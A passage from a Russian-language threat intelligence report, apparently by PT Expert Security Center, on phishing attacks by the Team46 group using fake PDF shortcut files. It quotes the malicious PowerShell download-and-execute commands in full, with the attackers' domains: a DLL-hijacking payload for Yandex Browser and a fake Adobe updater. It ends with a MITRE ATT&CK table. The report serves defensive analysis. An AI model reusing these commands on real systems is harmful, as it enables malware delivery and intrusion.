\u043b\u044e\u0434\u0438 \u0447\u0430\u0441\u0442\u043e \u0441\u0442\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0441 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u043c \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u043c \u0440\u0435\u0437\u044e\u043c\u0435.<\/p>\n<figure class=\"full-width\"><\/figure>\n<h2>\u0412\u0442\u043e\u0440\u0430\u044f \u0430\u0442\u0430\u043a\u0430<\/h2>\n<p>\u0412 \u0430\u043f\u0440\u0435\u043b\u0435 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0430\u043c\u0438 PT Expert Security Center \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 <code>SCAN_4024_2024_04_02.pdf.lnk<\/code> \u0438 <code>SCAN_4251_2024_03_25.pdf.lnk<\/code>, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0432\u0448\u0438\u0435 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>srv480138.hstgr.cloud\/uploads\/scan_3824.pdf<\/code> \u0434\u0440\u0443\u0433\u043e\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443.    <\/p>\n<figure class=\"full-width\"><\/figure>\n<p>\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0441\u043e\u0437\u0434\u0430\u043d 26.02.2024 \u0432 12:00:07 UTC+00:00 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Microsoft: Print To PDF \u0441 \u0438\u043c\u0435\u043d\u0435\u043c Remote Desktop Redirected Printer Doc, \u0447\u0442\u043e \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0443 \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 RDP, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0432\u044b\u0432\u0435\u043b\u0438 \u0435\u0433\u043e \u043d\u0430 \u043f\u0435\u0447\u0430\u0442\u044c \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 PDF. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0434\u043e\u043c\u0435\u043d\u0430 <code>srv480138.hstgr.cloud<\/code> \u044f\u0432\u043b\u044f\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u043d\u043e\u0439 \u043a\u043e\u043f\u0438\u0435\u0439 \u0441\u0430\u0439\u0442\u0430 <code>elevation.store<\/code> \u2014 \u0431\u044c\u044e\u0442\u0438-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0432 \u041e\u0410\u042d. \u0417\u0430\u0433\u043b\u0443\u0448\u043a\u0430 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u043d\u0435 \u0441\u043e\u043e\u0442\u043d\u043e\u0441\u0438\u043b\u0430\u0441\u044c \u0441 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u043c-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u043e\u0439, \u043d\u043e \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0432 \u041e\u0410\u042d, \u043d\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0439 \u043d\u0435 \u043d\u0430\u0448\u043b\u043e\u0441\u044c.<\/p>\n<h2>\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0430\u0442\u0430\u043a<\/h2>\n<p>\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u044f\u0440\u043b\u044b\u043a \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 powershell.exe \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:<\/p>\n<p><code>-w Minimized -ep Bypass -nop -c \"irm https:\/\/infosecteam.info\/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | iex\"<\/code><\/p>\n<p>\u041a\u0430\u0436\u0434\u043e\u043c\u0443 \u0430\u0434\u0440\u0435\u0441\u0430\u0442\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u044f\u0440\u043b\u044b\u043a \u0441 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c. \u042f\u0440\u043b\u044b\u043a \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435\u043c:<\/p>\n<p><code>C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w Minimized -ep Bypass -nop -c \"iwr 'http:\/\/infosecteam.info\/Job%20application.pdf' -OutFile $env:LOCALAPPDATA\\Temp\\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.0.0 Safari\/537.36 Edg\/121.0.0.';$env:LOCALAPPDATA\\Temp\\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf; iwr 'http:\/\/infosecteam.info\/base.php' -OutFile $env:LOCALAPPDATA\\Yandex\\YandexBrowser\\Application\\Wldp.dll -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.0.0 Safari\/537.36 Edg\/121.0.0.';\"<\/code> <\/p>\n<p>\u0421\u043a\u0440\u0438\u043f\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443 \u0438 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0435\u0433\u043e, \u0430 \u0437\u0430\u0442\u0435\u043c \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 DLL Hijacking, \u043f\u043e\u0434\u043c\u0435\u043d\u044f\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u0443\u044e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 <code>wldp.dll<\/code> \u0434\u043b\u044f \u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440\u0430. \u0412 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 User-Agent \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u043e\u043a\u0430, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0430\u044f\u0441\u044f \u043a \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0443 Microsoft Edge \u0432\u0435\u0440\u0441\u0438\u0438 121, \u0432\u044b\u0448\u0435\u0434\u0448\u0435\u0439 25 \u044f\u043d\u0432\u0430\u0440\u044f 2024 \u0433\u043e\u0434\u0430.<\/p>\n<p>\u042f\u0440\u043b\u044b\u043a \u0438\u0437 \u0432\u0442\u043e\u0440\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 powershell.exe \u0441 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:<\/p>\n<p><code>-w Minimized -ep Bypass -nop -c \"irm https:\/\/srv480138.hstgr.cloud\/warning.php?id=efu8crth52xe73hku1whp10h7i2unsnw | iex\"<\/code><\/p>\n<p>\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0442\u0430\u043a\u0436\u0435 \u0443\u043d\u0438\u043a\u0430\u043b\u0435\u043d \u0434\u043b\u044f \u043a\u0430\u0436\u0434\u043e\u0439 \u0446\u0435\u043b\u0438. \u042f\u0440\u043b\u044b\u043a \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043a\u0440\u0438\u043f\u0442:<\/p>\n<p><code>C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w Minimized -ep Bypass -nop -c \"iwr 'https:\/\/srv480138.hstgr.cloud\/uploads\/scan_3824.pdf' -OutFile $env:LOCALAPPDATA\\Temp\\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36 Edg\/120.0.0.';$env:LOCALAPPDATA\\Temp\\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf;iwr 'https:\/\/srv480138.hstgr.cloud\/report.php?query=$env:COMPUTERNAME' -OutFile $env:LOCALAPPDATA\\Temp\\AdobeUpdater.exe -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/118.0.0.1 YaBrowser\/23.11.0.0 Safari\/537.36';$env:LOCALAPPDATA\\Temp\\AdobeUpdater.exe;\"<\/code><\/p>\n<p>\u0412 \u044d\u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 Adobe Reader. \u0417\u0434\u0435\u0441\u044c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 User-Agent \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u043e\u043a\u0430, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0430\u044f\u0441\u044f \u0443\u0436\u0435 \u043a \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0443 Microsoft Edge \u0432\u0435\u0440\u0441\u0438\u0438 120, \u0432\u044b\u0448\u0435\u0434\u0448\u0435\u0439 7 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2023 \u0433\u043e\u0434\u0430, \u0445\u043e\u0442\u044f \u044d\u0442\u0430 \u0430\u0442\u0430\u043a\u0430 \u0431\u044b\u043b\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d\u0430 \u043f\u043e\u0437\u0436\u0435. \u0412\u0441\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u044b \u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u044b 15.11.2023 \u0432 11:12:27 UTC. \u041d\u043e \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u0438\u043c\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u2014 <code>desktop-420!69j<\/code>, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u2014 <code>Putin[REDACTED]<\/code>, \u0430 \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u0438\u043c\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u2014 <code>desktop-819jaxj<\/code>, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u2014 IgornWay. \u0412\u0442\u043e\u0440\u043e\u0435 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u0437\u0430\u043c\u0435\u043d\u0430 \u0431\u0443\u043a\u0432 \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043f\u0440\u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0438 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430. \u0422\u0430\u043a\u0438\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u0438\u044f \u0432 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0441\u0442\u0440\u043e\u043a\u0435 User-Agent \u043c\u043e\u0433\u0443\u0442 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u0430 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u0441\u0442\u043e\u0438\u0442 \u043d\u0435 \u043e\u0434\u0438\u043d \u0447\u0435\u043b\u043e\u0432\u0435\u043a, \u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u043b\u044e\u0434\u0435\u0439.<\/p>\n<h2>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>\u0414\u043b\u044f \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u0445 \u0438\u0441\u0442\u0438\u043d\u043d\u044b\u0445 \u043c\u043e\u0442\u0438\u0432\u043e\u0432 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043d\u0435 \u0445\u0432\u0430\u0442\u0430\u0435\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0430. \u041e\u0434\u043d\u0430\u043a\u043e, \u0441\u0443\u0434\u044f \u043f\u043e \u0443\u0440\u043e\u0432\u043d\u044e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0438 \u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u044b \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438, \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0434\u0435\u043b\u043e \u0441 \u0410\u0420\u0422-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439.<\/p>\n<p>\u041c\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Team46 \u0438 \u0436\u0434\u0435\u043c \u043e\u0442 \u043d\u0435\u0435 \u043d\u043e\u0432\u044b\u0445 \u0430\u0442\u0430\u043a.<\/p>\n<h2>TTP \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Team46 \u043f\u043e \u043c\u0430\u0442\u0440\u0438\u0446\u0435 MITRE ATT&amp;CK<\/h2>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"center\"><strong>ID<\/strong><\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"center\"><strong>\u0418\u043c\u044f<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"center\"><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Reconnaissance<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1589.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Gather Victim Identity Information: Email Addresses    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u043b\u0430 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u043f\u043e \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u0430\u043c \u0438\u0437 \u0443\u0442\u0435\u0447\u0435\u043a    <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Resource Development<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1583.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Acquire Infrastructure:\u00a0Domains <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0445 \u0438\u043c\u0435\u043d \u0434\u043b\u044f \u043f\u0440\u0438\u0434\u0430\u043d\u0438\u044f \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0433\u043e \u0432\u0438\u0434\u0430 \u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 Namecheap<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1583.003<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Acquire Infrastructure:\u00a0Virtual Private Server<\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0430 VPS \u0443 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Hostinger \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d \u043d\u0430 hstgr.cloud<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1583.004<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Acquire Infrastructure: Server    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0445\u043e\u0441\u0442\u0438\u043b\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043d\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 Namecheap<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1585.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Establish Accounts:\u00a0Email Accounts <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0434\u043b\u044f \u043f\u0440\u0438\u0434\u0430\u043d\u0438\u044f \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0433\u043e \u0432\u0438\u0434\u0430 \u043f\u0438\u0441\u044c\u043c\u0430\u043c \u0430\u0434\u0440\u0435\u0441 <code>jobs@rabotnik.today<\/code>, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0434\u043e\u043c\u0435\u043d\u043e\u0432    <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1608.005<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Stage Capabilities: Link Target    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0434\u043b\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0430\u0440\u0445\u0438\u0432\u043e\u0432 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u044f\u0440\u043b\u044b\u043a\u0430\u043c\u0438<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Initial Access<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1566.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Phishing: Spearphishing Attachment<\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u043b\u0430 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c RAR-\u0430\u0440\u0445\u0438\u0432\u043e\u043c, \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0432\u0448\u0438\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u044f\u0440\u043b\u044b\u043a, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0448\u043b\u044e\u0437\u043e\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1566.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Phishing:\u00a0Spearphishing Link<\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0432 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u043f\u0438\u0441\u044c\u043c\u0430\u0445 \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 RAR-\u0430\u0440\u0445\u0438\u0432 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f, \u043d\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0432\u0448\u0438\u0439 \u0442\u043e\u0442 \u0436\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u044f\u0440\u043b\u044b\u043a<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Execution<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1059.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Command and Scripting Interpreter: PowerShell <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442\u044b \u0434\u043b\u044f \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u044b\u0445 \u0441\u0442\u0430\u0434\u0438\u0439 \u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438    <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1204.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">User Execution: Malicious Link    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u043d\u0443\u0434\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u043a\u0430\u0447\u0430\u0442\u044c \u0430\u0440\u0445\u0438\u0432 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u044f\u0440\u043b\u044b\u043a\u043e\u043c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435, \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0447\u0435\u0440\u0435\u0437 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1204.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">User Execution: Malicious File    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u043d\u0443\u0434\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 